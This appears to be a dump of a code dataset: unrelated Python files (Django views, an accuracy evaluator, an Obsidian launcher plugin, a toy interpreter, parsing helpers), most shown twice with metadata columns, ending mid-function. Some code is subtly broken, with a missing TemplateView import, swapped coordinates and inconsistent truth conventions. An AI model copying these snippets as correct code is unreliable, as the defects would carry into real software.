from ipware import get_client_ip
from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
from django.conf import settings
from .forms import SearchForm
from users.models import CustomUser
import geopy
from geopy.distance import geodesic
import pandas as pd
import json
from django.utils.translation import gettext as _, activate
# required for IP to numeric
import socket
import struct
# import file for ip's to language mapping
df_ip_lang = pd.read_csv('pages/lng_map.csv', names=['ip_from', 'ip_to', 'country_code', 'country_name', 'lang_code'] )
def ip(request):
    """Return ``(address, visibility)`` for the requesting client.

    ``visibility`` is "Public" for a routable address, "Private" otherwise.

    Bug fix: when no client IP could be determined, the original left
    ``ipv`` unassigned and the return statement raised ``NameError``.
    """
    addr, is_routable = get_client_ip(request)
    if addr is None:
        # Unknown client: report the all-zeros address as private.
        return ("0.0.0.0", "Private")
    ipv = "Public" if is_routable else "Private"
    return (addr, ipv)
def ip2int(addr):
    """Convert a dotted-quad IPv4 string to its unsigned integer value."""
    packed = socket.inet_aton(addr)
    return int.from_bytes(packed, "big")
def index(request):
    """Render the home page, activating a UI language inferred from the
    client IP (or URL path) and, when a search was POSTed, attaching
    nearby matching users to the template context.

    POST data used: 'search-field' (location text) and 'search-catogery'
    (group id as string; '4' means all groups).
    """
    search = request.POST.get('search-field')
    searchCat = request.POST.get('search-catogery')
    locator = geopy.Nominatim(user_agent="myGeocoder")
    gotodiv = False

    # ---- Map the client IP to a UI language -------------------------
    request_ip = ip(request)                # (address, visibility)
    request_ip_int = ip2int(request_ip[0])  # numeric form for range lookup
    df_filt = df_ip_lang[df_ip_lang.ip_from <= request_ip_int]
    range_to_check = df_filt.iloc[-1]
    # Bug fix: the original wrote ``a > b & c < d``; ``&`` binds tighter
    # than the comparisons, so it computed a bitwise AND instead of the
    # intended "ip lies inside [ip_from, ip_to]" check.
    is_in_range = (request_ip_int > range_to_check.ip_from
                   and request_ip_int < range_to_check.ip_to)
    country_code = 'en-us'  # default language
    if is_in_range:
        country_code = range_to_check.lang_code
    activate(country_code)

    # A language selected manually via the URL path overrides the IP guess.
    current_path = str(request.get_full_path()).strip('/')
    print(current_path)
    if current_path == 'en':
        activate('en-us')
    elif current_path != '':
        activate(current_path)

    context = {}
    if search != None:
        location = locator.geocode(search, timeout=5)
        if not hasattr(location, 'longitude'):
            # Geocoding failed: fall back to a default city.
            location = locator.geocode('Hamburg', timeout=5)
        # Security fix: ``searchCat`` comes straight from POST data; the
        # original concatenated it into the SQL string (SQL injection).
        # Use a parameterized raw query instead.
        if searchCat == '4':  # '4' means "all categories"
            raw_sql = 'SELECT * FROM users_customuser'
            params = []
        else:
            raw_sql = 'SELECT * FROM users_customuser WHERE group_membership like %s'
            params = [searchCat]
        print(raw_sql)
        df = pd.DataFrame(
            [u.id, u.group_membership, u.longitude, u.latitude, u.slogan,
             u.zip_code, u.description, u.map_show_location, u.username,
             u.help_type, u.userImg_Url, u.shop_type]
            for u in CustomUser.objects.raw(raw_sql, params)
        )
        df.columns = ['id', 'group_membership', 'longitude', 'latitude',
                      'slogan', 'zip_code', 'description', 'map_show_location',
                      'username', 'help_type', 'userImg_Url', 'shop_type']
        # NOTE(review): geopy's ``geodesic`` expects (latitude, longitude)
        # pairs; (longitude, latitude) is passed here for both points.
        # Kept as-is to preserve behavior -- confirm and fix separately.
        df['distance'] = [
            geodesic((location.longitude, location.latitude), (x, y)).miles
            for x, y in zip(df['longitude'], df['latitude'])
        ]
        # filter for distance max 20km (12.4 miles)
        df_filt = df[df['distance'] < 12.4]
        print(df_filt)
        # Flatten the columns into plain lists for the template.
        group_membership = [int(x) for x in df_filt['group_membership'].values.tolist()]
        help_type = df_filt['help_type'].values.tolist()
        userImg_Url = df_filt['userImg_Url'].values.tolist()
        slogan = df_filt['slogan'].values.tolist()
        shop_type = df_filt['shop_type'].values.tolist()  # currently unused by the template
        description = df_filt['description'].values.tolist()
        username = df_filt['username'].values.tolist()
        zipcode = df_filt['zip_code'].values.tolist()
        longitudes = df_filt['longitude'].values.tolist()
        latitudes = df_filt['latitude'].values.tolist()
        ids = df_filt['id'].values.tolist()
        map_show_location = [int(x) for x in df_filt['map_show_location'].values.tolist()]
        rname = list(range(0, len(ids)))
        template_table = list(zip(rname, ids, slogan, description, zipcode))
        gotodiv = 'search'
        context = {'longitude': location.longitude, 'latitude': location.latitude,
                   'id': ids, 'userImg_Url': userImg_Url,
                   'group_membership': group_membership, 'longitudes': longitudes,
                   'latitudes': latitudes, 'slogan': slogan,
                   'description': description, 'gotodiv': gotodiv,
                   'map_show_location': map_show_location,
                   'template_table': template_table, 'username': username,
                   'help_type': help_type}
    return render(request, 'pages/home.html', context)
class HomePageView(TemplateView):
    # Static landing page rendered via Django's generic TemplateView.
    template_name = 'pages/home.html'

class AboutPageView(TemplateView):
    # Static "about" page.
    template_name = 'pages/about.html'
def searchLocation(request):
    """Render the home page with a ``SearchForm`` (bound to POST data on POST)."""
    # NOTE(review): passing ``request`` itself as the first argument makes it
    # act as the form's *data*; normally an unbound form is ``SearchForm()``
    # -- confirm the intended constructor arguments.
    form = SearchForm(request)
    print(form)
    if request.method=='POST':
        form = SearchForm(request.POST)
    return render(request, 'pages/home.html', {'form': form})
def change_password(request):
    """Handle the password-change form: GET shows it, valid POST applies it."""
    if request.method == 'POST':
        form = PasswordChangeForm(request.user, request.POST)
        if form.is_valid():
            user = form.save()
            # Keep the user logged in after the password change.
            update_session_auth_hash(request, user)  # Important!
            messages.success(request, 'Your password was successfully updated!')
            return redirect('change_password')
        else:
            messages.error(request, 'Please correct the error below.')
    else:
        form = PasswordChangeForm(request.user)
    return render(request, 'account/password_set.html', {
        'form': form
    })
def privacy(request):
    """Render the static privacy-policy page."""
    return render(request, 'pages/privacy.html')

def imprint(request):
    """Render the static imprint page."""
    return render(request, 'pages/imprint.html')

def terms(request):
    """Render the static terms-and-conditions page."""
    return render(request, 'pages/terms_conditions.html')

def cookie_policy(request):
    """Render the static cookie-policy page."""
    return render(request, 'pages/cookie_policy.html')
| pt | 0.149896 | 2.083017 | 2 |
image-classification/evaluate_classification.py | rush2406/vipriors-challenges-toolkit | 56 | 13552 | """
Use this script to evaluate your model. It stores metrics in the file
`scores.txt`.
Input:
predictions (str): filepath. Should be a file that matches the submission
format;
groundtruths (str): filepath. Should be an annotation file.
Usage:
evaluate_classification.py <groundtruths> <predictions> <output_dir>
"""
import numpy as np
import pandas as pd
import os
import sys
OUTPUT_FILE = 'scores.txt'

def evaluate_from_files(groundtruths_filepath, predictions_filepath, output_dir):
    """Compute top-1 accuracy of *predictions* against *groundtruths* and
    write it to ``<output_dir>/scores.txt``.

    Both inputs are CSV files whose first column is the image id and whose
    second column is the class label. Images missing from the predictions
    are skipped (not counted as errors).
    """
    ground_truth = pd.read_csv(groundtruths_filepath).to_numpy()
    submission = pd.read_csv(predictions_filepath).to_numpy()

    # Index both tables by image id (first column).
    indexed_gt = {row[0]: row for row in ground_truth}
    indexed_sbm = {row[0]: row for row in submission}

    tp = 0.0
    fp = 0.0
    for im_idx, gt_row in indexed_gt.items():
        pred_row = indexed_sbm.get(im_idx)
        if pred_row is None:
            continue
        if gt_row[1] == pred_row[1]:
            tp += 1.
        else:
            fp += 1.
    # Bug fix: the original divided unconditionally (ZeroDivisionError when
    # no prediction matched any ground-truth id) and contained a no-op
    # ``output_dir = output_dir`` assignment.
    total = tp + fp
    acc = tp / total if total else 0.0
    print('accuracy', acc)

    metrics = [("Top1 accuracy", acc)]
    with open(os.path.join(output_dir, OUTPUT_FILE), 'w') as f:
        for name, val in metrics:
            f.write(f"{name}: {val:.8f}\n")
    print("Metrics written to scores.txt.")
if __name__ == '__main__':
args = sys.argv[1:]
evaluate_from_files(args[0], args[1], args[2]) | """
Use this script to evaluate your model. It stores metrics in the file
`scores.txt`.
Input:
predictions (str): filepath. Should be a file that matches the submission
format;
groundtruths (str): filepath. Should be an annotation file.
Usage:
evaluate_classification.py <groundtruths> <predictions> <output_dir>
"""
import numpy as np
import pandas as pd
import os
import sys
OUTPUT_FILE = 'scores.txt'

def evaluate_from_files(groundtruths_filepath, predictions_filepath, output_dir):
    """Compute top-1 accuracy of *predictions* against *groundtruths* and
    write it to ``<output_dir>/scores.txt``.

    Both inputs are CSV files whose first column is the image id and whose
    second column is the class label. Images missing from the predictions
    are skipped (not counted as errors).
    """
    ground_truth = pd.read_csv(groundtruths_filepath).to_numpy()
    submission = pd.read_csv(predictions_filepath).to_numpy()

    # Index both tables by image id (first column).
    indexed_gt = {row[0]: row for row in ground_truth}
    indexed_sbm = {row[0]: row for row in submission}

    tp = 0.0
    fp = 0.0
    for im_idx, gt_row in indexed_gt.items():
        pred_row = indexed_sbm.get(im_idx)
        if pred_row is None:
            continue
        if gt_row[1] == pred_row[1]:
            tp += 1.
        else:
            fp += 1.
    # Bug fix: the original divided unconditionally (ZeroDivisionError when
    # no prediction matched any ground-truth id) and contained a no-op
    # ``output_dir = output_dir`` assignment.
    total = tp + fp
    acc = tp / total if total else 0.0
    print('accuracy', acc)

    metrics = [("Top1 accuracy", acc)]
    with open(os.path.join(output_dir, OUTPUT_FILE), 'w') as f:
        for name, val in metrics:
            f.write(f"{name}: {val:.8f}\n")
    print("Metrics written to scores.txt.")
if __name__ == '__main__':
args = sys.argv[1:]
evaluate_from_files(args[0], args[1], args[2]) | pt | 0.105109 | 2.933514 | 3 |
class Solution:
    def generate(self, numRows: int) -> List[List[int]]:
        """Return the first ``numRows`` rows of Pascal's triangle."""
        rows = [[1]]
        while len(rows) < numRows:
            prev = rows[-1]
            # Each new row is the element-wise sum of the previous row
            # shifted right and shifted left, padded with zeros.
            rows.append([a + b for a, b in zip([0] + prev, prev + [0])])
        return rows
class Solution:
    def generate(self, numRows: int) -> List[List[int]]:
        """Return the first ``numRows`` rows of Pascal's triangle."""
        rows = [[1]]
        while len(rows) < numRows:
            prev = rows[-1]
            # Each new row is the element-wise sum of the previous row
            # shifted right and shifted left, padded with zeros.
            rows.append([a + b for a, b in zip([0] + prev, prev + [0])])
        return rows
| none | 1 | 3.140776 | 3 |
__init__.py | j0rd1smit/obsidian-albert-plugin | 1 | 13554 | <gh_stars>1-10
# -*- coding: utf-8 -*-
"""A simple plugin that makes it possible to search your Obsidian vault.
This extension makes it possible to search your Obsidian vault. For more information please visit https://github.com/j0rd1smit/obsidian-albert-plugin.
Synopsis: ob <query>"""
from albert import *
import os
from time import sleep
from pathlib import Path
import sys
import json
__title__ = "Obsidian"
__version__ = "0.0.1"
__triggers__ = "ob "
__authors__ = "J0rd1smit"
__exec_deps__ = []
__py_deps__ = []
PATH_TO_CONFIG_FOLDER = Path.home() / ".config/albert/obsidian-plugin"
PATH_TO_CONFIG_DATA = PATH_TO_CONFIG_FOLDER / "config.json"
PATH_TO_ICON = os.path.dirname(__file__) + "/plugin.png"
iconPath = iconLookup("albert")
def initialize():
    """Albert plugin hook: ensure the config folder and default config exist."""
    PATH_TO_CONFIG_FOLDER.mkdir(parents=True, exist_ok=True)
    if not PATH_TO_CONFIG_DATA.exists():
        _create_default_config()
def _create_default_config():
    """Write a starter config file.

    The user must edit ``vault_name`` / ``path_to_vault`` (and the
    REPLACE_WITH_VAULT_NAME placeholder in the command URI) to match
    their own vault.
    """
    with open(PATH_TO_CONFIG_DATA, "w") as f:
        data = {
            "vault_name": "obsidian",
            "path_to_vault": str(Path.home() / "obsidian"),
            "commands": [
                {
                    "name": "New note",
                    "subtext": "Add a new note to the vault",
                    "uri": "obsidian://new?vault=REPLACE_WITH_VAULT_NAME&name={{q}}"
                }
            ],
        }
        json.dump(data, f, indent=4)
def handleQuery(query):
    """Albert plugin hook: return result items for a triggered query.

    Builds one item per markdown note in the vault and one per configured
    command, then returns only the items with the highest match ranking.
    """
    if not query.isTriggered:
        return
    query_text = query.string.lower()
    # Re-read the config on every query so edits take effect immediately.
    with open(PATH_TO_CONFIG_DATA) as f:
        config = json.load(f)
    vault_name = config["vault_name"]
    path_to_vault = Path(config["path_to_vault"])
    commands = config["commands"]
    item_ranking_pairs = []
    max_ranking = 0
    # One "open note" item per markdown file in the vault.
    for path in path_to_vault.rglob("*.md"):
        item, ranking = create_open_note_item(vault_name, path_to_vault, path, query_text)
        max_ranking = max(max_ranking, ranking)
        item_ranking_pairs.append((item, ranking))
    # One item per user-configured URI command.
    for command in commands:
        item, ranking = create_uri_item(query_text, command)
        max_ranking = max(max_ranking, ranking)
        item_ranking_pairs.append((item, ranking))
    # Keep only the best-matching items.
    return [item for (item, ranking) in item_ranking_pairs if ranking == max_ranking]
def create_open_note_item(
    vault_name,
    path_to_vault,
    path_to_file,
    query,
):
    """Build an Albert item that opens ``path_to_file`` in Obsidian.

    Returns a ``(item, ranking)`` pair where the ranking is the number of
    query words found in the note's vault-relative path.
    """
    rel_path = str(path_to_file).replace(str(path_to_vault), "")
    open_url = f"obsidian://open?vault={vault_name}&file={to_uri_encoding(rel_path)}"
    item = Item(
        id=__title__,
        icon=PATH_TO_ICON,
        text=path_to_file.name,
        subtext=rel_path,
        actions=[UrlAction(text="UrlAction", url=open_url)],
    )
    return item, _n_matches(rel_path, query)
def to_uri_encoding(s):
    """Percent-encode the two characters Obsidian URIs need escaped: space and slash."""
    encoded = s.replace(" ", "%20")
    return encoded.replace("/", "%2F")
def _n_matches(key, query):
key = key.lower()
matches = 0
for search_key in query.split(" "):
if search_key in key:
matches += 1
return matches
def create_uri_item(
    query,
    uri_config,
):
    """Build an Albert item for a configured Obsidian URI command.

    Args:
        query: the (lower-cased) user query text.
        uri_config: dict with "name", "subtext" and "uri" keys; the uri may
            contain a ``{{q}}`` placeholder that receives the remaining
            free-text part of the query.

    Returns:
        ``(item, ranking)`` where the ranking counts query words that match
        the command's name/subtext.
    """
    name = uri_config["name"]
    subtext = uri_config["subtext"]
    uri_template = uri_config["uri"]

    # Strip the command's own words from the query; what remains is the
    # free-text argument substituted into the URI.
    q = query.lower()
    for i in name.lower().split():
        q = q.replace(i, "")

    action = UrlAction(
        text="UrlAction",
        url=uri_template.replace("{{q}}", to_uri_encoding(q)),
    )

    item = Item(id=__title__,
                icon=PATH_TO_ICON,
                text=name,
                subtext=subtext,
                actions=[action],
                )

    # Rank against both the command name and its subtext.  (Bug fix: the
    # previous code replaced the key with just the subtext, discarding the
    # name from the match.)
    key = name
    if len(subtext) > 0:
        key = name + " " + subtext
    return item, _n_matches(key, query)
| # -*- coding: utf-8 -*-
"""A simple plugin that makes it possible to search your Obsidian vault.
This extension makes it possible to search your Obsidian vault. For more information please visit https://github.com/j0rd1smit/obsidian-albert-plugin.
Synopsis: ob <query>"""
from albert import *
import os
from time import sleep
from pathlib import Path
import sys
import json
__title__ = "Obsidian"
__version__ = "0.0.1"
__triggers__ = "ob "
__authors__ = "J0rd1smit"
__exec_deps__ = []
__py_deps__ = []
PATH_TO_CONFIG_FOLDER = Path.home() / ".config/albert/obsidian-plugin"
PATH_TO_CONFIG_DATA = PATH_TO_CONFIG_FOLDER / "config.json"
PATH_TO_ICON = os.path.dirname(__file__) + "/plugin.png"
iconPath = iconLookup("albert")
def initialize():
PATH_TO_CONFIG_FOLDER.mkdir(parents=True, exist_ok=True)
if not PATH_TO_CONFIG_DATA.exists():
_create_default_config()
def _create_default_config():
with open(PATH_TO_CONFIG_DATA, "w") as f:
data = {
"vault_name": "obsidian",
"path_to_vault": str(Path.home() / "obsidian"),
"commands": [
{
"name": "New note",
"subtext": "Add a new note to the vault",
"uri": "obsidian://new?vault=REPLACE_WITH_VAULT_NAME&name={{q}}"
}
],
}
json.dump(data, f, indent=4)
def handleQuery(query):
if not query.isTriggered:
return
query_text = query.string.lower()
with open(PATH_TO_CONFIG_DATA) as f:
config = json.load(f)
vault_name = config["vault_name"]
path_to_vault = Path(config["path_to_vault"])
commands = config["commands"]
item_ranking_pairs = []
max_ranking = 0
for path in path_to_vault.rglob("*.md"):
item, ranking = create_open_note_item(vault_name, path_to_vault, path, query_text)
max_ranking = max(max_ranking, ranking)
item_ranking_pairs.append((item, ranking))
for command in commands:
item, ranking = create_uri_item(query_text, command)
max_ranking = max(max_ranking, ranking)
item_ranking_pairs.append((item, ranking))
return [item for (item, ranking) in item_ranking_pairs if ranking == max_ranking]
def create_open_note_item(
vault_name,
path_to_vault,
path_to_file,
query,
):
path_rel_to_vault = str(path_to_file).replace(str(path_to_vault), "")
path_rel_to_vault_encoded = to_uri_encoding(path_rel_to_vault)
action = UrlAction(
text="UrlAction",
url=f"obsidian://open?vault={vault_name}&file={path_rel_to_vault_encoded}",
)
item = Item(
id=__title__,
icon=PATH_TO_ICON,
text=path_to_file.name,
subtext=path_rel_to_vault,
actions=[action],
)
return item, _n_matches(path_rel_to_vault, query)
def to_uri_encoding(s):
return s.replace(' ', '%20').replace("/", "%2F")
def _n_matches(key, query):
key = key.lower()
matches = 0
for search_key in query.split(" "):
if search_key in key:
matches += 1
return matches
def create_uri_item(
query,
uri_config,
):
name = uri_config["name"]
subtext = uri_config["subtext"]
uri_template = uri_config["uri"]
q = query.lower()
for i in name.lower().split():
q = q.replace(i, "")
action = UrlAction(
text="UrlAction",
url=uri_template.replace("{{q}}", to_uri_encoding(q)),
)
item = Item(id=__title__,
icon=PATH_TO_ICON,
text=name,
subtext=subtext,
actions=[action],
)
key = name
if len(subtext) > 0:
key = " " + subtext
return item, _n_matches(key, query) | pt | 0.116388 | 2.900512 | 3 |
py3Server/ClassMate/botResponses.py | GFBryson/myProjects | 1 | 13555 | <reponame>GFBryson/myProjects
class responder():
    """Canned chat-bot reply templates.

    All methods are stateless, so they are declared as ``@staticmethod``:
    they remain callable on the class (``responder.resp_hello()``) as before,
    and — unlike the previous definitions, which took no ``self`` — they now
    also work on instances (``responder().resp_hello()``).
    """

    @staticmethod
    def resp_hello():
        """Return the greeting templates; "{usr}" is the username placeholder."""
        hello = []
        hello.append('Hey there "{usr}"! how\'s it going?')
        hello.append('Hi "{usr}" :grinning:')
        hello.append('Hello "{usr}", whats up?')
        hello.append('Hey "{usr}" :wave:,\nHow are you doing?')
        hello.append('Hi "{usr}"!\nI\'m StrugBot, and I\'m super happy to be here!!')
        hello.append('Sup "{usr}"!')
        hello.append('Hi "{usr}",\nwhat can I do for you?')
        hello.append('WAZZZZUUUUUUUUUUUUUUP "{usr}"')
        return hello

    @staticmethod
    def resp_trex():
        """Return the fixed T-Rex joke reply."""
        return"I am a T-Rex!:t-rex:\nI have a BIG head and little arms,\nRAWWWRRRRR!!"

    @staticmethod
    def resp_date():
        """Return the prefix for a date reply (date itself appended by the caller)."""
        return 'the date is: '

    @staticmethod
    def resp_time():
        """Return the prefix for a time reply (time itself appended by the caller)."""
        return 'the time is: '
| class responder():
def resp_hello():
hello=[]
hello.append('Hey there "{usr}"! how\'s it going?')
hello.append('Hi "{usr}" :grinning:')
hello.append('Hello "{usr}", whats up?')
hello.append('Hey "{usr}" :wave:,\nHow are you doing?')
hello.append('Hi "{usr}"!\nI\'m StrugBot, and I\'m super happy to be here!!')
hello.append('Sup "{usr}"!')
hello.append('Hi "{usr}",\nwhat can I do for you?')
hello.append('WAZZZZUUUUUUUUUUUUUUP "{usr}"')
return hello
def resp_trex():
return"I am a T-Rex!:t-rex:\nI have a BIG head and little arms,\nRAWWWRRRRR!!"
def resp_date():
return 'the date is: '
def resp_time():
return 'the time is: ' | none | 1 | 3.131957 | 3 |
List_5/Task_1/instructions.py | Szpila123/Advanced_python_course | 0 | 13556 | import expressions
import abc
import copy
class Instruction(abc.ABC):
    """Abstract base class for executable program instructions.

    Subclasses implement ``wykonaj`` ("execute"), which receives a mapping
    of variable names to integer values and returns the (possibly updated)
    mapping.
    """

    @abc.abstractmethod
    def __init__(): ...

    @abc.abstractmethod
    def wykonaj(self, zmienne) -> dict[str, int]:
        '''Evaluate the instruction'''
        ...

    @abc.abstractmethod
    def __str__(self): ...
class If(Instruction):
    """Conditional instruction.

    NOTE(review): the *true* branch is taken when the condition evaluates
    to 0, i.e. zero is treated as "true" here — confirm this convention
    against the expressions module (``While`` below uses the opposite,
    Python truthiness).
    """

    def __init__(self, cond: expressions.Wyrazenie, branch_true: Instruction, branch_false: Instruction):
        self._cond = cond
        self._branch_true = branch_true
        self._branch_false = branch_false

    def wykonaj(self, zmienne):
        """Execute the selected branch in a copied scope.

        The branch runs on a shallow copy of ``zmienne``; afterwards only
        variables that already existed in the outer scope are written back,
        so variables created inside the branch stay local to it.
        """
        if self._cond.oblicz(zmienne) == 0:
            lokalne_zmienne = self._branch_true.wykonaj(copy.copy(zmienne))
        else:
            lokalne_zmienne = self._branch_false.wykonaj(copy.copy(zmienne))
        # Write back only pre-existing variables (branch-local ones are dropped).
        for key in lokalne_zmienne:
            if key in zmienne:
                zmienne[key] = lokalne_zmienne[key]
        return zmienne

    def __str__(self):
        # Re-indent the branches one tab level for pretty-printing.
        tab, nl = '\n\t\t', '\n'
        return f'if {str(self._cond)}\n\n\tthen\t{tab.join(str(self._branch_true).split(nl))}\n\n\telse\t{tab.join(str(self._branch_false).split(nl))}\n'
class While(Instruction):
    """Loop instruction: repeats its body while the condition is truthy.

    NOTE(review): the loop continues while ``oblicz`` returns a non-zero
    value, which is the opposite truth convention of ``If`` above (where 0
    selects the true branch) — confirm which one is intended.
    """

    def __init__(self, cond: expressions.Wyrazenie, branch: Instruction):
        self._cond = cond
        self._branch = branch

    def wykonaj(self, zmienne):
        """Repeatedly execute the body in a copied scope until the condition fails.

        Each iteration runs on a shallow copy of ``zmienne``; only variables
        that already existed in the outer scope are written back, so
        loop-local variables do not leak.
        """
        while self._cond.oblicz(zmienne):
            lokalne_zmienne = self._branch.wykonaj(copy.copy(zmienne))
            # Write back only pre-existing variables (loop-local ones are dropped).
            for key in lokalne_zmienne:
                if key in zmienne:
                    zmienne[key] = lokalne_zmienne[key]
        return zmienne

    def __str__(self):
        # Re-indent the body one tab level for pretty-printing.
        tab, nl = '\n\t\t', '\n'
        return f'while {str(self._cond)}\n\n\tdo\t{tab.join(str(self._branch).split(nl))}\n'
class Chain(Instruction):
    """A sequence of instructions executed in order, threading the variable map."""

    def __init__(self, instructions: list[Instruction]):
        self._chain = instructions

    def wykonaj(self, zmienne):
        """Run every instruction in order; each receives the previous result."""
        for instruction in self._chain:
            zmienne = instruction.wykonaj(zmienne)
        return zmienne

    def __str__(self):
        return '\n'.join(str(instruction) for instruction in self._chain)
class Assign(Instruction):
    """Assignment instruction: evaluate an expression and bind it to a variable."""

    def __init__(self, var: expressions.Zmienna, val: expressions.Wyrazenie):
        self._var = var
        self._val = val

    def wykonaj(self, zmienne):
        """Store the evaluated value under the variable's name; return the map."""
        name = str(self._var)
        zmienne[name] = self._val.oblicz(zmienne)
        return zmienne

    def __str__(self):
        return f'{self._var} = {self._val}'
| import expressions
import abc
import copy
class Instruction(abc.ABC):
@abc.abstractmethod
def __init__(): ...
@abc.abstractmethod
def wykonaj(self, zmienne) -> dict[str, int]:
'''Evaluate the instruction'''
...
@abc.abstractmethod
def __str__(self): ...
class If(Instruction):
def __init__(self, cond: expressions.Wyrazenie, branch_true: Instruction, branch_false: Instruction):
self._cond = cond
self._branch_true = branch_true
self._branch_false = branch_false
def wykonaj(self, zmienne):
if self._cond.oblicz(zmienne) == 0:
lokalne_zmienne = self._branch_true.wykonaj(copy.copy(zmienne))
else:
lokalne_zmienne = self._branch_false.wykonaj(copy.copy(zmienne))
for key in lokalne_zmienne:
if key in zmienne:
zmienne[key] = lokalne_zmienne[key]
return zmienne
def __str__(self):
tab, nl = '\n\t\t', '\n'
return f'if {str(self._cond)}\n\n\tthen\t{tab.join(str(self._branch_true).split(nl))}\n\n\telse\t{tab.join(str(self._branch_false).split(nl))}\n'
class While(Instruction):
def __init__(self, cond: expressions.Wyrazenie, branch: Instruction):
self._cond = cond
self._branch = branch
def wykonaj(self, zmienne):
while self._cond.oblicz(zmienne):
lokalne_zmienne = self._branch.wykonaj(copy.copy(zmienne))
for key in lokalne_zmienne:
if key in zmienne:
zmienne[key] = lokalne_zmienne[key]
return zmienne
def __str__(self):
tab, nl = '\n\t\t', '\n'
return f'while {str(self._cond)}\n\n\tdo\t{tab.join(str(self._branch).split(nl))}\n'
class Chain(Instruction):
def __init__(self, instructions: list[Instruction]):
self._chain = instructions
def wykonaj(self, zmienne):
for inst in self._chain:
zmienne = inst.wykonaj(zmienne)
return zmienne
def __str__(self):
return '\n'.join([str(inst) for inst in self._chain])
class Assign(Instruction):
def __init__(self, var: expressions.Zmienna, val: expressions.Wyrazenie):
self._var = var
self._val = val
def wykonaj(self, zmienne):
zmienne[str(self._var)] = self._val.oblicz(zmienne)
return zmienne
def __str__(self):
return f'{self._var} = {self._val}'
| pt | 0.121851 | 3.394838 | 3 |
components/icdc-sheepdog/sheepdog/utils/parse.py | CBIIT/icdc-docker | 2 | 13557 | """
TODO
"""
from collections import Counter
import simplejson
import yaml
import flask
from sheepdog.errors import (
UserError,
)
def oph_raise_for_duplicates(object_pairs):
    """
    Given a list of ordered pairs, construct a dict as with the normal JSON
    ``object_pairs_hook``, but raise an exception if there are duplicate keys
    with a message describing all violations.

    Args:
        object_pairs: list of (key, value) pairs as produced by the JSON parser.

    Returns:
        dict built from the pairs.

    Raises:
        ValueError: if any key occurs more than once, naming every duplicate.
    """
    counter = Counter(pair[0] for pair in object_pairs)
    # Counter.iteritems() was Python-2-only; .items() works on both 2 and 3.
    duplicates = [key for key, count in counter.items() if count > 1]
    if duplicates:
        raise ValueError(
            'The document contains duplicate keys: {}'
            .format(','.join(duplicates))
        )
    return dict(object_pairs)
def parse_json(raw):
    """
    Return a python representation of a JSON document.

    Args:
        raw (str): string of raw JSON content

    Raises:
        UserError: if any exception is raised parsing the JSON body

    .. note:: Uses :func:`oph_raise_for_duplicates` in parser.
    """
    try:
        parsed = simplejson.loads(raw, object_pairs_hook=oph_raise_for_duplicates)
    except Exception as e:
        raise UserError('Unable to parse json: {}'.format(e))
    return parsed
def parse_request_json(expected_types=(dict, list)):
    """
    Return a python representation of the JSON POST body of the current
    flask request.

    Args:
        expected_types: tuple of acceptable top-level types for the document.

    Returns:
        The parsed document (one of ``expected_types``).

    Raises:
        UserError: if the body cannot be parsed as JSON, or if the parsed
            result is not one of the expected types.
    """
    parsed = parse_json(flask.request.get_data())
    if isinstance(parsed, expected_types):
        return parsed
    raise UserError('JSON parsed from request is an invalid type: {}'
                    .format(parsed.__class__.__name__))
def parse_request_yaml():
    """
    Return a python representation of the YAML POST body of the current
    flask request.

    Raises:
        UserError: if any exception is raised while reading or parsing
            the YAML body.
    """
    try:
        parsed = yaml.safe_load(flask.request.get_data())
    except Exception as e:
        raise UserError('Unable to parse yaml: {}'.format(e))
    else:
        return parsed
| """
TODO
"""
from collections import Counter
import simplejson
import yaml
import flask
from sheepdog.errors import (
UserError,
)
def oph_raise_for_duplicates(object_pairs):
"""
Given an list of ordered pairs, contstruct a dict as with the normal JSON
``object_pairs_hook``, but raise an exception if there are duplicate keys
with a message describing all violations.
"""
counter = Counter(p[0] for p in object_pairs)
duplicates = [p for p in counter.iteritems() if p[1] > 1]
if duplicates:
raise ValueError(
'The document contains duplicate keys: {}'
.format(','.join(d[0] for d in duplicates))
)
return {pair[0]: pair[1] for pair in object_pairs}
def parse_json(raw):
"""
Return a python representation of a JSON document.
Args:
raw (str): string of raw JSON content
Raises:
UserError: if any exception is raised parsing the JSON body
.. note:: Uses :func:`oph_raise_for_duplicates` in parser.
"""
try:
return simplejson.loads(
raw, object_pairs_hook=oph_raise_for_duplicates
)
except Exception as e:
raise UserError('Unable to parse json: {}'.format(e))
def parse_request_json(expected_types=(dict, list)):
"""
Return a python representation of a JSON POST body.
Args:
raw (str): string of raw JSON content
Return:
TODO
Raises:
UserError: if any exception is raised parsing the JSON body
UserError: if the result is not of the expected type
If raw is not provided, pull the body from global request object.
"""
parsed = parse_json(flask.request.get_data())
if not isinstance(parsed, expected_types):
raise UserError('JSON parsed from request is an invalid type: {}'
.format(parsed.__class__.__name__))
return parsed
def parse_request_yaml():
"""
Return a python representation of a YAML POST body. Raise UserError if any
exception is raised parsing the YAML body.
"""
try:
return yaml.safe_load(flask.request.get_data())
except Exception as e:
raise UserError('Unable to parse yaml: {}'.format(e))
| pt | 0.199533 | 2.665372 | 3 |
frames/rocket/rocket_frames.py | rkinwork/dvmn_async-console-game | 0 | 13558 | <filename>frames/rocket/rocket_frames.py
from pathlib import Path
def get_rockets_frames():
    """Load the rocket animation frames shipped next to this module.

    Returns a tuple of frame strings, one per ``rocket_frame_*.txt`` file.
    """
    base_dir = Path(__file__).resolve().parent
    frame_names = ('rocket_frame_1.txt', 'rocket_frame_2.txt')
    return tuple((base_dir / name).read_text() for name in frame_names)
| <filename>frames/rocket/rocket_frames.py
from pathlib import Path
def get_rockets_frames():
"""Init rocket animation frames."""
frames_files = ['rocket_frame_1.txt', 'rocket_frame_2.txt']
frames = [(Path(__file__).resolve().parent / frame_file_name).read_text() for frame_file_name in frames_files]
return tuple(frames)
| pt | 0.169212 | 2.44771 | 2 |
JuHPLC/views.py | FZJ-INM5/JuHPLC | 1 | 13559 | <filename>JuHPLC/views.py
from JuHPLC.Views.NewChromatogram import *
from JuHPLC.SerialCommunication.MicroControllerManager import MicroControllerManager
# Create your views here.
def index(request):
    """Render the overview page listing every chromatogram (newest first).

    Each chromatogram is annotated with ``data`` (whether any HPLC data
    points exist for it) and the template receives the ids of currently
    active measurements.
    """
    chromatograms = Chromatogram.objects.all().order_by("-Datetime")
    for i in chromatograms:
        # exists() lets the database stop at the first matching row instead
        # of counting all of them (same truth value as count() > 0).
        i.data = HplcData.objects.filter(Chromatogram=i).exists()
    return render(request, "index.html", {
        "chromatograms": chromatograms,
        "active": MicroControllerManager.getinstance().getactivechromatogramids()
    })
def mychromatograms(request):
